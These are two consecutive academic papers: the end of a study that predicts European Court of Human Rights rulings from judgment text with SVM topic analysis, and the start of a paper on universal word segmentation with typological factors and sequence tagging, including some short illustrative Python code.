paper, we may here simplify by observing that since the beginning of the 20th century, there has been a major contention between two opposing ways of making sense of judicial decision-making: legal formalism and legal realism (Posner, 1986; Tamanaha, 2009; Leiter, 2010). Very roughly, legal formalists have provided a legal model of judicial decision-making, claiming that the law is rationally determinate: judges either decide cases deductively, by subsuming facts under formal legal rules or use more complex legal reasoning than deduction whenever legal rules are insufficient to warrant a particular outcome (Pound, 1908; Kennedy, 1973; Grey, 1983; Pildes, 1999). On the other hand, legal realists have criticized formalist models, insisting that judges primarily decide appellate cases by responding to the stimulus of the facts of the case, rather than on the basis of legal rules or doctrine, which are in many occasions rationally indeterminate (Llewellyn, 1996; Schauer, 1998; Baum, 2009; Leiter, 2007; Miles & Sunstein, 2008). Extensive empirical research on the decision-making processes of various supreme and international courts, and especially the US Supreme Court, has indicated rather consistently Aletras etal (2016), PeerJ Comput. 
Sci., DOI 10.7717/peerj-cs.93 11/19 that pure legal models, especially deductive ones, are false as an empirical matter when it comes to cases decided by courts further up the hierarchy. As a result, it is suggested that the best way to explain past decisions of such courts and to predict future ones is by placing emphasis on other kinds of empirical variables that affect judges (Baum, 2009; Schauer, 1998). For example, early legal realists had attempted to classify cases in terms of regularities that can help predict outcomes, in a way that did not reflect standard legal doctrine (Llewellyn, 1996). Likewise, the attitudinal model for the US Supreme Court claims that the best predictors of its decisions are the policy preferences of the Justices and not legal doctrinal arguments (Segal & Spaeth, 2002). In general, and notwithstanding the simplified snapshot of a very complex debate that we just presented, our results could be understood as lending some support to the basic legal realist intuition according to which judges are primarily responsive to non-legal, rather than to legal, reasons when they decide hard cases. In particular, if we accept that the ‘Circumstances’ subsection, with all the caveats we have already voiced, is a (crude) proxy for non-legal facts and the ‘Law’ subsection is a (crude) proxy for legal reasons and arguments, the predictive superiority of the ‘Circumstances’ subsection seems to cohere with extant legal realist treatments of judicial decision-making. However, not more should be read into this than our results allow. First, as we have already stressed at several occasions, the ‘Circumstances’ subsection is not a neutral statement of the facts of the case and we have only assumed the similarity of that subsection with analogous sections found in lodged applications and briefs. Second, it is important to underline that the results should also take into account the so-called selection effect (Priest & Klein, 1984) that pertains to cases judged by the ECtHR as an international court. Given that the largest percentage of applications never reaches the Chamber or, still less, the Grand Chamber, and that cases have already been tried at the national level, it could very well be the case that the set of ECtHR decisions on the merits primarily refers to cases in which the class of legal reasons, defined in a formal sense, is already considered as indeterminate by competent interpreters. This could help explain why judges primarily react to the facts of the case, rather than to legal arguments. Thus, further text-based analysis is needed in order to determine whether the results could generalise to other courts, especially to domestic courts deciding ECHR claims that are placed lower within the domestic judicial hierarchy. Third, our discussion of the realism/formalism debate is overtly simplified and does not imply that the results could not be interpreted in a sophisticated formalist way. Still, our work coheres well with a bulk of other empirical approaches in the legal realist vein. Topic analysis The topics further exemplify this line of interpretation and provide proof of the usefulness of the NLP approach. The linear kernel of the SVM model can be used to examine which topics are most important for inferring whether an article of the Convention has been violated or not by looking at their weights w. Tables 3– 5 present the six topics for the most positive and negative SVM weights for the articles 3, 6 and 8, respectively. 
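Given a trained linear model, the ranking of topics (or N-grams) by weight that underlies Tables 3–5 can be reproduced along the following lines. This is an illustrative sketch assuming a fitted scikit-learn LinearSVC called `model` and a list `feature_names` aligned with its feature columns (the vectorizer's vocabulary or the topic labels); it is not the authors' own analysis code.

```python
import numpy as np

def most_predictive(model, feature_names, k=6):
    """Return the k features with the most positive (violation) and most
    negative (no violation) weights of a fitted linear SVM."""
    weights = model.coef_.ravel()                 # one weight per feature/topic
    order = np.argsort(weights)
    top_violation = [(feature_names[i], weights[i]) for i in order[::-1][:k]]
    top_no_violation = [(feature_names[i], weights[i]) for i in order[:k]]
    return top_violation, top_no_violation
```

Because the classes are labelled +1 for violation and −1 for non-violation, positive weights point towards violation and negative weights towards non-violation, matching the sign convention used in the tables.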
Topics identify in a sufficiently robust manner patterns of fact scenarios that correspond to well-established trends in the Court’s case law. Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 12/19 7Note that all the cases used as examples in this section are taken from the data set we used to perform the experiments. Table 3 The most predictive topics for Article 3 decisions. Most predictive topics for Article 3, represented by the 20 most frequent words, listed in order of their SVM weight. Topic labels are manually added. Positive weights (w) denote more predictive topics for violation and negative weights for no violation. Topic Label Words w Top-5 Violation 4 Positive State Obligations injury, protection, ordered, damage, civil, caused, failed, claim, course, connection, region, effective, quashed, claimed, suffered, suspended, carry, compensation, pecuniary, ukraine 13.50 10 Detention conditions prison, detainee, visit, well, regard, cpt, access, food, situation, problem, remained, living, support, visited, establishment, standard, admissibility merit, overcrowding, contact, good 11.70 3 Treatment by state officials police, officer, treatment, police officer, July, ill, force, evidence, ill treatment, arrest, allegation, police station, subjected, arrested, brought, subsequently, allegedly, ten, treated, beaten 10.20 Top-5 No Violation 8 Prior Violation of Article 2 june, statement, three, dated, car, area, jurisdiction, gendarmerie, perpetrator, scene, June applicant, killing, prepared, bullet, wall, weapon, kidnapping, dated June, report dated, stopped −12.40 19 Issues of Proof witness, asked, told, incident, brother, heard, submission, arrived, identity, hand, killed, called, involved, started, entered, find, policeman, returned, father, explained −15.20 13 Sentencing sentence, year, life, circumstance, imprisonment, release, set, president, administration, sentenced, term, constitutional, federal, appealed, twenty, convicted, continued, regime, subject, responsible −17.40 First, topic 13 in Table 3 has to do with whether long prison sentences and other detention measures can amount to inhuman and degrading treatment under Article 3. That is correctly identified as typically not giving rise to a violation (European Court of Human Rights, 2015). For example, cases7 such as Kafkaris v. Cyprus ([GC] no. 21906/04, ECHR 2008-I), Hutchinson v. UK (no. 57592/08 of 3 February 2015) and Enea v. Italy ([GC], no. 74912/01, ECHR 2009-IV) were identified as exemplifications of this trend. Likewise, topic 28 in Table 5 has to do with whether certain choices with regard to the social policy of states can amount to a violation of Article 8. That was correctly identified as typically not giving rise to a violation, in line with the Court’s tendency to acknowledge a large margin of appreciation to states in this area (Greer, 2000). In this vein, cases such as Aune v. Norway (no. 52502/07 of 28 October 2010) and Ball v. Andorra (Application no. 40628/10 of 11 December 2012) are examples of cases where topic 28 is dominant. Similar observations apply, among other things, to topics 23, 24 and 27. That includes issues with the enforcement of domestic judgments giving rise to a violation of Article 6 (Kiestra, 2014). Some representative cases are Velskaya v. Russia, of 5 October 2006 and Aleksandrova v. Russia of 6 December 2007. Topic 7 in Table 4 is related to lower standard of review when property rights are at play (Tsarapatsanis, 2015). 
A representative Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 13/19 Table 4 The most predictive topics for Article 6 decisions. Most predictive topics for Article 6, represented by the 20 most frequent words, listed in order of their SVM weight. Topic labels are manually added. Positive weights (w) denote more predictive topics for violation and negative weights for no violation. Topic Label Words w Top-5 Violation 27 Enforcement of domestic judgments and reasonable time appeal, enforcement, damage, instance, dismissed, established, brought, enforcement proceeding, execution, limit, court appeal, instance court, caused, time limit, individual, responsible, receipt, court decision, copy, employee 11.70 23 Enforcement of domestic judgments and reasonable time court, applicant, article, judgment, case, law, proceeding, application, government, convention, time, article convention, January, human, lodged, domestic, February, September, relevant, represented 9.15 24 Enforcement of domestic judgments and reasonable time party, final, respect, set, interest, alleged, general, violation, entitled, complained, obligation, read, fair, final judgment, violation article, served, applicant complained, summons, convention article, fine 6.78 Top-5 No violation 10 Criminal limb defendant, detention, witness, cell, counsel, condition, defence, court upheld, charged, serious, regional court upheld, pre, remand, inmate, pre trial, extended, detained, temporary, defence counsel, metre −5.71 3 Criminal limb procedure, judge, fact, federal, justice, reason, charge, point, criminal procedure, code criminal, code criminal procedure, result, pursuant, article code, lay, procedural, point law, indictment, lay judge, argued, appeal point law −7.01 7 Property rights and claims by companies compensation, company, property, examined, cassation, rejected, declared, owner, deputy, tula, returned, duly, enterprise, moscow, foreign, appears, control, violated, absence, transferred −9.08 case here is Oao Plodovaya Kompaniya v. Russia of 7 June 2007. Consequently, the topics identify independently well-established trends in the case law without recourse to expert legal/doctrinal analysis. The above observations require to be understood in a more mitigated way with respect to a (small) number of topics. For instance, most representative cases for topic 8 in Table 3 were not particularly informative. This is because these were cases involving a person’s death, in which claims of violations of Article 3 (inhuman and degrading treatment) were only subsidiary: this means that the claims were mainly about Article 2, which protects the right to life. In these cases, the absence of a violation, even if correctly identified, is more of a technical issue on the part of the Court, which concentrates its attention on Article 2 and rarely, if ever, moves on to consider independently a violation of Article 3. This is exemplified by cases such as Buldan v. Turkey of 20 April 2004 and Nuray Şen v. Turkey of 30 March 2004, which were, again, correctly identified. On the other hand, cases have been misclassified mainly because their textual information is similar to cases in the opposite class. We observed a number of cases where there is a Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 14/19 Table 5 The most predictive topics for Article 8 decisions. Most predictive topics for Article 8, represented by the 20 most frequent words, listed in order of their SVM weight. Topic labels are manually added. 
Positive weights (w) denote more predictive topics for violation and negative weights for no violation. Topic Label Words w Top-5 Violation 30 Death and military action son, body, result, russian, department, prosecutor office, death, group, relative, head, described, military, criminal investigation, burial, district prosecutor, men, deceased, town, attack, died 15.70 1 Unlawful limitation clauses health moral, law democratic, law democratic society, disorder crime, prevention disorder, prevention disorder crime, economic well, protection health, interest national, interest national security, public authority exercise, interference public authority exercise, national security public, exercise law democratic, public authority exercise law, authority exercise law democratic, exercise law, authority exercise law, exercise law democratic society, crime protection 12.20 26 Judicial procedure second, instance, second applicant, victim, municipal, violence, authorised, address, municipal court, relevant provision, behaviour, register, appear, maintenance, instance court, defence, procedural, decide, court decided, quashed 9.51 Top-5 No violation 25 Discretion of state authorities service, obligation, data, duty, review, high, system, test, concern, building, agreed, professional, positive, threat, carry, van, accepted, step, clear, panel −7.89 28 Social policy contact, social, care, expert, opinion, living, welfare, county, physical, psychological, agreement, divorce, restriction, support, live, dismissed applicant, prior, remained, court considered, expressed −12.30 4 Migration cases national, year, country, residence, minister, permit, requirement, netherlands, alien, board, claimed, stay, contrary, objection, spouse, residence permit, close, deputy, deportation, brother −13.50 violation having a very similar feature vector to cases that there is no violation and vice versa. CONCLUSIONS We presented the first systematic study on predicting judicial decisions of the European Court of Human Rights using only the textual information extracted from relevant sections of ECtHR judgments. We framed this task as a binary classification problem, where the training data consists of textual features extracted from given cases and the output is the actual decision made by the judges. Apart from the strong predictive performance that our statistical NLP framework achieved, we have reported on a number of qualitative patterns that could potentially drive judicial decisions. More specifically, we observed that the information regarding the Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 15/19 factual background of the case as this is formulated by the Court in the relevant subsection of its judgments is the most important part obtaining on average the strongest predictive performance of the Court’s decision outcome. We suggested that, even if understood only as a crude proxy and with all the caveats that we have highlighted, the rather robust correlation between the outcomes of cases and the text corresponding to fact patterns contained in the relevant subsections coheres well with other empirical work on judicial decision-making in hard cases and backs basic legal realist intuitions. Finally, we believe that our study opens up avenues for future work, using different kinds of data (e.g., texts of individual applications, briefs submitted by parties or domestic judgments) coming from various sources (e.g., the European Court of Human Rights, national authorities, law firms). 
However, data access issues pose a significant barrier for scientists to work on such kinds of legal data. Large repositories like HUDOC, which are easily and freely accessible, are only case law databases. Access to other kinds of data, especially lodged applications and briefs, would enable further research in the intersection of legal science and artificial intelligence. ADDITIONAL INFORMATION AND DECLARATIONS Funding DPP received funding from Templeton Religion Trust (https://www.templeton.org) grant number: TRT-0048. VL received funding from Engineering and Physical Sciences Research Council (http://www.epsrc.ac.uk) grant number: EP/K031953/1. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Templeton Religion Trust: TRT-0048. Engineering and Physical Sciences Research Council: EP/K031953/1. Competing Interests Nikolaos Aletras is an employee of Amazon.com, Cambridge, UK, but work was completed while at University College London. Author Contributions • Nikolaos Aletras and Vasileios Lampos conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Dimitrios Tsarapatsanis conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 16/19 • Daniel Preoţiuc-Pietro conceived and designed the experiments, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: ECHR dataset: https://figshare.com/s/6f7d9e7c375ff0822564. REFERENCES Bamman D, Eisenstein J, Schnoebelen T. 2014. Gender identity and lexical variation in social media. Journal of Sociolinguistics 18(2):135–160 DOI 10.1111/josl.12080. Baum L. 2009. The puzzle of judicial behavior. University of Michigan Press. Chang Y-W, Lin C-J. 2008. Feature ranking using linear SVM. In: WCCI causation and prediction challenge, 53–64. European Court of Human Rights. 2015. Factsheet on life imprisonment. Strasbourg: European Court of Human Rights. Available at http://www.echr.coe.int/Documents/ FS_Life_sentences_ENG.pdf . Greer SC. 2000. The margin of appreciation: interpretation and discretion under the European Convention on Human Rights, vol. 17. Council of Europe. Grey TC. 1983. Langdell’s orthodoxy. University of Pittsburgh Law Review 45:1–949. Helfer LR. 2008. Redesigning the European Court of Human Rights: embeddedness as a deep structural principle of the European human rights regime. European Journal of International Law 19(1):125–159 DOI 10.1093/ejil/chn004. Joachims T. 2002. Learning to classify text using support vector machines: methods, theory and algorithms. Kluwer Academic Publishers. Kennedy D. 1973. Legal formality. The Journal of Legal Studies 2(2):351–398 DOI 10.1086/467502. Keown R. 1980. Mathematical models for legal prediction. Computer/LJ 2:829. Kiestra LR. 2014. The impact of the European Convention on Human Rights on private international law. Springer. Kort F. 1957. 
Predicting Supreme Court decisions mathematically: a quantitative analysis of the ‘‘right to counsel’’ cases. American Political Science Review 51(01):1–12 DOI 10.2307/1951767. Lampos V, Aletras N, Preoţiuc-Pietro D, Cohn T. 2014. Predicting and characterising user impact on Twitter. In: Proceedings of the 14th conference of the European Chapter of the Association for Computational Linguistics, 405–413. Lampos V, Cristianini N. 2012. Nowcasting events from the social web with statistical learning. ACM Transactions on Intelligent Systems and Technology 3(4):72:1–72:22. Lauderdale BE, Clark TS. 2012. The Supreme Court’s many median justices. American Political Science Review 106(04):847–866 DOI 10.1017/S0003055412000469. Lauderdale BE, Clark TS. 2014. Scaling politically meaningful dimensions using texts and votes. American Journal of Political Science 58(3):754–771 DOI 10.1111/ajps.12085. Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 17/19 Lawlor RC. 1963. What computers can do: analysis and prediction of judicial decisions. American Bar Association Journal 49:337–344. Leach P. 2013. Taking a case to the European Court of Human Rights. Oxford: Oxford University Press. Leach P, Paraskeva C, Uelac G. 2010. Human rights fact-finding. The European Court of Human Rights at a crossroads. Netherlands Quarterly of Human Rights 28(1):41–77. Leiter B. 2007. Naturalizing Jurisprudence: essays on American legal realism and naturalism in legal philosophy. Oxford: Oxford University Press. Leiter B. 2010. Legal formalism and legal realism: what is the issue? Legal Theory 16(2):111–133 DOI 10.1017/S1352325210000121. Llewellyn KN. 1996. The common law tradition: deciding appeals. William S. Hein & Co., Inc.. Miles TJ, Sunstein CR. 2008. The new legal realism. The University of Chicago Law Review 75(2):831–851. Nagel SS. 1963. Applying correlation analysis to case prediction. Texas Law Review 42:1006. Pildes RH. 1999. Forms of formalism. The University of Chicago Law Review 66(3):607–621 DOI 10.2307/1600419. Popple J. 1996. A pragmatic legal expert system. Applied Legal Philosophy Series, Dart- mouth (Ashgate), Aldershot. Posner RA. 1986. Legal formalism, legal realism, and the interpretation of statutes and the constitution. Case Western Reserve Law Review 37:179–217. Pound R. 1908. Mechanical jurisprudence. Columbia Law Review 8(8):605–623. Preoţiuc-Pietro D, Lampos V, Aletras N. 2015. An analysis of the user occupational class through Twitter content. In: Proceedings of the 53rd annual meeting of the Association for Computational Linguistics and the 7th international joint conference on natural language processing (Volume 1: Long Papers). 1754–1764. Preoţiuc-Pietro D, Volkova S, Lampos V, Bachrach Y, Aletras N. 2015. Studying user income through language, behaviour and affect in social media. PLoS ONE 10(9):1–17 DOI 10.1371/journal.pone.0138717. Priest GL, Klein B. 1984. The selection of disputes for litigation. The Journal of Legal Studies 13(1):1–55 DOI 10.1086/467732. Salton G, McGill MJ. 1986. Introduction to modern information retrieval. New York: McGraw-Hill, Inc. Salton G, Wong A, Yang C-S. 1975. A vector space model for automatic indexing. Communications of the ACM 18(11):613–620 DOI 10.1145/361219.361220. Schauer F. 1998. Prediction and particularity. Boston University Law Review 78:773. Segal JA. 1984. Predicting Supreme Court cases probabilistically: the search and seizure cases, 1962–1981. American Political Science Review 78(04):891–900 DOI 10.2307/1955796. 
Segal JA, Spaeth HJ. 2002. The Supreme Court and the attitudinal model revisited. Cambridge: Cambridge University Press. Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 18/19 Sim Y, Routledge BR, Smith NA. 2015. The utility of text: the case of Amicus briefs and the Supreme Court. In: Twenty-Ninth AAAI conference on artificial intelligence. Tamanaha BZ. 2009. Beyond the formalist-realist divide: the role of politics in judging. Princeton: Princeton University Press. Tsarapatsanis D. 2015. The margin of appreciation doctrine: a low-level institutional view. Legal Studies 35(4):675–697 DOI 10.1111/lest.12089. Turney PD, Pantel P. 2010. From frequency to meaning: vector space models of semantics. Journal of Artificial Intelligence Research 37:141–188. Vapnik VN. 1998. Statistical learning theory. New York: Wiley. von Luxburg U. 2007. A tutorial on spectral clustering. Statistics and Computing 17(4):395–416. Wang S, Manning CD. 2012. Baselines and bigrams: simple, good sentiment and topic classification. In: Proceedings of the 50th annual meeting of the Association for Computational Linguistics: short papers-Volume 2. 90–94. Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 19/19 work_2tzdxx7pkvbbbb62pwqubu6nfe ---- Universal Word Segmentation: Implementation and Interpretation Yan Shao, Christian Hardmeier, Joakim Nivre Department of Linguistics and Philology, Uppsala University {yan.shao, christian.hardmeier, joakim.nivre}@lingfil.uu.se Abstract Word segmentation is a low-level NLP task that is non-trivial for a considerable number of languages. In this paper, we present a sequence tagging framework and apply it to word segmentation for a wide range of lan- guages with different writing systems and ty- pological characteristics. Additionally, we in- vestigate the correlations between various ty- pological factors and word segmentation ac- curacy. The experimental results indicate that segmentation accuracy is positively related to word boundary markers and negatively to the number of unique non-segmental terms. Based on the analysis, we design a small set of language-specific settings and extensively evaluate the segmentation system on the Uni- versal Dependencies datasets. Our model ob- tains state-of-the-art accuracies on all the UD languages. It performs substantially better on languages that are non-trivial to segment, such as Chinese, Japanese, Arabic and He- brew, when compared to previous work. 1 Introduction Word segmentation is the initial step for most higher level natural language processing tasks, such as part-of-speech tagging (POS), parsing and machine translation. It can be regarded as the problem of correctly identifying word forms from a character string. Word segmentation can be very challenging, es- pecially for languages without explicit word bound- ary delimiters, such as Chinese, Japanese and Viet- namese. Even for space-delimited languages like English or Russian, relying on white space alone generally does not result in adequate segmentation as at least punctuation should usually be separated from the attached words. For some languages, the space-delimited units in the surface form are too coarse-grained and therefore often further analysed, as in the cases of Arabic and Hebrew. Even though language-specific word segmentation systems are near-perfect for some languages, it is still useful to have a single system that performs reasonably with no or minimum language-specific adaptations. 
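To make the point about whitespace concrete, the toy example below (our own illustration, not taken from the paper) shows that splitting on spaces leaves punctuation attached to the neighbouring word, while a naive character-class rule over-segments contractions that UD instead analyses as multiword tokens.

```python
import re

text = "However, this isn't segmentation."

print(text.split())
# ['However,', 'this', "isn't", 'segmentation.']   # punctuation stays attached

print(re.findall(r"\w+|[^\w\s]", text))
# ['However', ',', 'this', 'isn', "'", 't', 'segmentation', '.']
# whereas UD treats "isn't" as a multiword token yielding the words "is" and "n't"
```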
Word segmentation standards vary substantially with different definitions of the concept of a word. In this paper, we will follow the teminologies of Universal Dependencies (UD), where words are de- fined as basic syntactic units that do not always coincide with phonological or orthographic words. Some orthographic tokens, known in UD as mul- tiword tokens, therefore need to be broken into smaller units that cannot always be obtained by split- ting the input character sequence.1 To perform word segmentation in the UD frame- work, neither rule-based tokenisers that rely on white space nor the naive character-level sequence tagging model proposed previously (Xue, 2003) are ideal. In this paper, we present an enriched sequence labelling model for universal word segmentation. It is capable of segmenting languages in very diverse written forms. Furthermore, it simultaneously iden- tifies the multiword tokens defined by the UD frame- work that cannot be resolved simply by splitting 1Note that this notion of multiword token has nothing to do with the notion of multiword expression (MWE) as discussed, for example, in Sag et al. (2002). 421 Transactions of the Association for Computational Linguistics, vol. 6, pp. 421–435, 2018. Action Editor: Sebastian Padó . Submission batch: 3/2018; Revision batch: 6/2018; Published 7/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. the input character sequence. We adapt a regular sequence tagging model, namely the bidirectional recurrent neural networks with conditional random fields (CRF) (Lafferty et al., 2001) interface as the fundamental framework (BiRNN-CRF) (Huang et al., 2015) for word segmentation. The main contributions of this work include: 1. We propose a sequence tagging model for word segmentation, both for general purposes (mere splitting) and full UD processing (splitting plus occasional transduction). 2. We investigate the correlation between segmen- tation accuracy and properties of languages and writing systems, which is helpful in interpret- ing the gaps between segmentation accuracies across different languages as well as selecting language-specific settings for the model. 3. Our segmentation system achieves state-of-the- art accuracy on the UD datasets and improves on previous work (Straka and Straková, 2017) especially for the most challenging languages. 4. We provide an open source implementation.2 2 Word Segmentation in UD The UD scheme for cross-linguistically consistent morphosyntactic annotation defines words as syn- tactic units that have a unique part-of-speech tag and enter into syntactic relations with other words (Nivre et al., 2016). For languages that use whitespace as boundary markers, there is often a mismatch be- tween orthographic words, called tokens in the UD terminology, and syntactic words. Typical examples are clitics, like Spanish dámelo = da me lo (1 token, 3 words), and contractions, like French du = de le (1 token, 2 words). Tokens that need to split into multiple words are called multiword tokens and can be further subdivided into those that can be handled by simple segmentation, like English cannot = can not, and those that require a more complex transduc- tion, like French du = de le. We call the latter non- segmental multiword tokens. In addition to multi- word tokens, the UD scheme also allows multitoken words, that is, words consisting of multiple tokens, such as numerical expressions like 20 000. 
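For illustration, a non-segmental multiword token such as French du = de le is represented in a CoNLL-U file roughly as follows: a range ID covers the surface token and the syntactic words follow on their own lines. The fragment below is simplified (most columns are omitted) and is not copied from a particular treebank.

```
1-2	du	_	_
1	de	de	ADP
2	le	le	DET
```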
2 https://github.com/yanshao9798/segmenter 3 Word Segmentation and Typological Factors We begin with the analysis of the difficulty of word segmentation. Word segmentation is fundamen- tally more difficult for languages like Chinese and Japanese because there are no explicit word bound- ary markers in the surface form (Xue, 2003). For Vietnamese, the space-segmented units are syllables that roughly correspond to Chinese characters rather than words. To characterise the challenges of word segmentation posed by different languages, we will examine several factors that vary depending on lan- guage and writing system. We will refer to these as typological factors although most of them are only indirectly related to the traditional notion of linguis- tic typology and depend more on writing system. • Character Set Size (CS) is the number of unique characters, which is related to how in- formative the characters are to word segmen- tation. Each character contains relatively more information if the character set size is larger. • Lexicon Size (LS) is the number of unique word forms in a dataset, which indicates how many unique word forms have to be identified by the segmentation system. Lexicon size in- creases as the dataset grows in size. • Average Word Length (AL) is calculated by dividing the total character count by the word count. It is negatively correlated with the den- sity of word boundaries. If the average word length is smaller, there are more word bound- aries to be predicted. • Segmentation Frequency (SF) denotes how likely it is that space-delimited units are fur- ther segmented. It is calculated by dividing the word count by the space-segment count. Lan- guages like Chinese and Japanese have much higher segmentation frequencies than space- delimited languages. • Multiword Token Portion (MP) is the per- centage of multiword tokens that are non- segmental. • Multiword Token Set Size (MS) is the number of unique non-segmental multiword tokens. The last two factors are specific to the UD scheme but can have a significant impact on word segmenta- tion accuracy. 422 Figure 1: K-Means clustering (K = 6) of the UD languages. PCA is applied for dimensionality reduction. CS LS AL SF MP MS 0.058 0.938 0.101 -0.043 -0.060 -0.028 Table 1: Pearson product-moment correlation coeffi- cients between dataset size and the statistical factors. All the languages in the UD dataset are charac- terised and grouped by the typological factors in Fig- ure 1. We standardise the statistics x of the proposed factors on the UD datasets with the arithmetic mean µ and the standard deviation σ as x−µ σ . We use them as features and apply K-Means clustering (K = 6) to group the languages. Principal component anal- ysis (PCA) (Abdi and Williams, 2010) is used for dimensionality reduction and visualisation. The majority of the languages in UD are space- delimited with few or no multiword tokens and they are grouped at the bottom left of Figure 1. They are statistically similar from the perspective of word segmentation. The Semitic languages Arabic and Hebrew with rich non-segmental multiword tokens are positioned at the top. In addition, languages with large character sets and high segmentation fre- quencies, such as Chinese, Japanese and Vietnamese are clustered together. Korean is distanced from the other space-delimited languages as it contains white-space delimiters but has a comparatively large character set. 
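The six factors and the clustering described above can be reproduced from a word-segmented corpus with a short script. The sketch below is our own illustration, not the authors' code: the input format, the variable names and the reading of MP as the share of tokens that are non-segmental multiword tokens are assumptions. The last function shows the standardisation, K-Means (K = 6) and PCA step with scikit-learn.

```python
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler

def typological_factors(sentences):
    """sentences: list of sentences, each a list of (token, words) pairs, where
    `token` is a space-delimited surface unit and `words` are the syntactic
    words it yields. A token counts as a non-segmental multiword token when its
    words cannot be recovered by simply splitting its characters."""
    chars, lexicon, mwt_types = set(), set(), set()
    n_words = n_chars = n_tokens = n_mwt = 0
    for sentence in sentences:
        for token, words in sentence:
            n_tokens += 1
            chars.update(token)
            for w in words:
                lexicon.add(w)
                n_words += 1
                n_chars += len(w)
            if len(words) > 1 and "".join(words) != token.replace(" ", ""):
                n_mwt += 1
                mwt_types.add(token)
    return [len(chars),            # CS: character set size
            len(lexicon),          # LS: lexicon size
            n_chars / n_words,     # AL: average word length
            n_words / n_tokens,    # SF: segmentation frequency
            n_mwt / n_tokens,      # MP: non-segmental multiword token portion
            len(mwt_types)]        # MS: unique non-segmental multiword tokens

def cluster_languages(factor_matrix, k=6):
    """Standardise the factors as (x - mu) / sigma, cluster the datasets with
    K-Means and project them to two dimensions with PCA for visualisation."""
    x_std = StandardScaler().fit_transform(factor_matrix)
    labels = KMeans(n_clusters=k, n_init=10).fit_predict(x_std)
    coords = PCA(n_components=2).fit_transform(x_std)
    return labels, coords
```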
Overall, the x-axis of Figure 1 is pri- marily related to character set size and segmentation Language CS LS AL SF MP MS Czech 140 125,342 4.83 1.26 0.0018 9 Czech-CAC 93 66,256 5.06 1.20 0.0022 12 Czech-CLIT 96 2,774 5.30 1.14 0.0005 1 English 108 19,672 4.06 1.24 0.0 0 English-LinES 82 7,436 4.01 1.22 0.0 0 English-ParTUT 94 5,532 4.50 1.22 0.0002 6 Finnish 244 49,210 6.49 1.28 0.0 0 Finnish-FTB 95 39,717 5.94 1.14 0.0 0 French 298 42,250 4.33 1.27 0.0281 9 French-ParTUT 96 3,364 4.53 1.27 0.0344 4 French-Sequota 108 8,452 4.48 1.29 0.0277 7 Latin 57 6,927 5.05 1.28 0.0 0 Latin-ITTB 42 12,526 5.06 1.24 0.0 0 Portuguese 114 26,653 4.15 1.32 0.0746 710 Portuguese-BR 186 29,906 4.11 1.29 0.0683 35 Russian 189 25,708 5.21 1.26 0.0 0 Russian-SynTagRus 157 107,890 5.12 1.30 0.0 0 Slovenian 99 29,390 4.63 1.23 0.0 0 Slovenian-SST 40 4,534 4.29 1.12 0.0 0 Swedish 86 12,911 4.98 1.20 0.0 0 Swedish-LinES 86 9,659 4.50 1.19 0.0 0 Table 2: Different UD datasets in same languages and the statistical factors. frequency, while the y-axis is mostly associated with multiword tokens. Dataset sizes for different languages in UD vary substantially. Table 1 shows the correlation coef- ficients between the dataset size in sentence num- ber and the six typological factors. Apart from the lexicon size, all the other factors, including multi- word token set size, have no strong correlations with dataset size. From Table 2, we can see that the 423 Char. On considère qu’environ 50 000 Allemands du Wartheland ont péri pendant la période. Tags BEXBIIIIIIIEXBIEBIIIIIEXBIIIIEXBIIIIIIIEXBEXBIIIIIIIIEXBIEXBIIEXBIIIIIEXBEXBIIIIIES Figure 2: Tags employed for word segmentation. 50 000 is a multitoken word, while qu’environ and du are multiword tokens that should be processed differently. factors, except for lexicon size, are relatively sta- ble across different UD treebanks for the same lan- guage, which indicates that they do capture proper- ties of these languages, although some variation in- evitably occurs due to corpus properties like genre. In this paper, we thoroughly investigate the corre- lations between the proposed statistical factors and segmentation accuracy. Moreover, we aim to find specific settings that can be applied to improve seg- mentation accuracy for each language group. 4 Sequence Tagging Model Word segmentation can be modelled as a character- level sequence labelling task (Xue, 2003; Chen et al., 2015). Characters as basic input units are passed into a sequence labelling model and a sequence of tags that are associated with word boundaries are predicted. In this section, we introduce the boundary tags adopted in this paper. Theoretically, binary classification is sufficient to indicate whether a character is the end of a word for segmentation. In practice, more fine-grained tagsets result in higher segmentation accuracy (Zhao et al., 2006). Following the work of Shao et al. (2017), we employ a baseline tagset consisting of four tags: B, I, E, and S, to indicate a character positioned at the beginning (B), inside (I), or at the end (E) of a word, or occurring as a single-character word (S). The baseline tagset can be applied to word seg- mentation of Chinese and Japanese without further modification. For languages with space-delimiters, we add an extra tag X to mark the characters, mostly spaces, that do not belong to any words/tokens. As illustrated in Figure 2, the regular spaces are marked with X while the space in a multitoken word like 50 000 is disambiguated with I. 
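Generating these tags from segmented training data is straightforward. The sketch below is our own illustration and assumes that the gold words and the positions of raw-text spaces are known; it reproduces the scheme of Figure 2, with X for spaces between tokens and I for spaces inside multitoken words such as 50 000.

```python
def boundary_tags(words, space_after):
    """words: gold words in order; space_after[i] is True if a raw-text space
    follows words[i]. Spaces inside a multitoken word (e.g. '50 000') belong to
    the word itself and therefore end up tagged I rather than X."""
    tags = []
    for word, space in zip(words, space_after):
        if len(word) == 1:
            tags.append("S")
        else:
            tags.extend(["B"] + ["I"] * (len(word) - 2) + ["E"])
        if space:
            tags.append("X")
    return tags

# The tail of the Figure 2 example:
# boundary_tags(["la", "période", "."], [True, False, False])
# -> ['B', 'E', 'X', 'B', 'I', 'I', 'I', 'I', 'I', 'E', 'S']
```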
